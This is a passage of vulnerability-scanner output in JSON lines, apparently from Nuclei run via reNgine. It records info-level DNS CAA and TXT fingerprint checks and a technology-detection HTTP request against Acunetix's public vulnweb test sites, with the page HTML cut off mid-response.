86400\\n\",\"timestamp\":\"2024-11-13T02:34:41.236440692Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 43234\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 43234\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86400\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:41.237489548Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 4907\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 4907\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86400\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:41.237487703Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 36273\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 36273\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86400\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:41.237647957Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 58711\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 58711\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1800\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:41.238002078Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 36998\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 36998\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86400\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:41.238923644Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 27146\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 27146\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1800\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:41.239715276Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 54495\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 54495\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1800\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:41.254249787Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 28129\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 28129\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1800\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:41.254810861Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 55643\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 55643\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86400\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:41.256948257Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 46615\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 46615\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86400\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:41.257188676Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 10537\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 10537\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3599\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:41.258430991Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 18990\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 18990\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:41.261473246Z\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"google-font-api\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com\",\"matched-at\":\"http://testhtml5.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0 OS/10.0.22631\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp 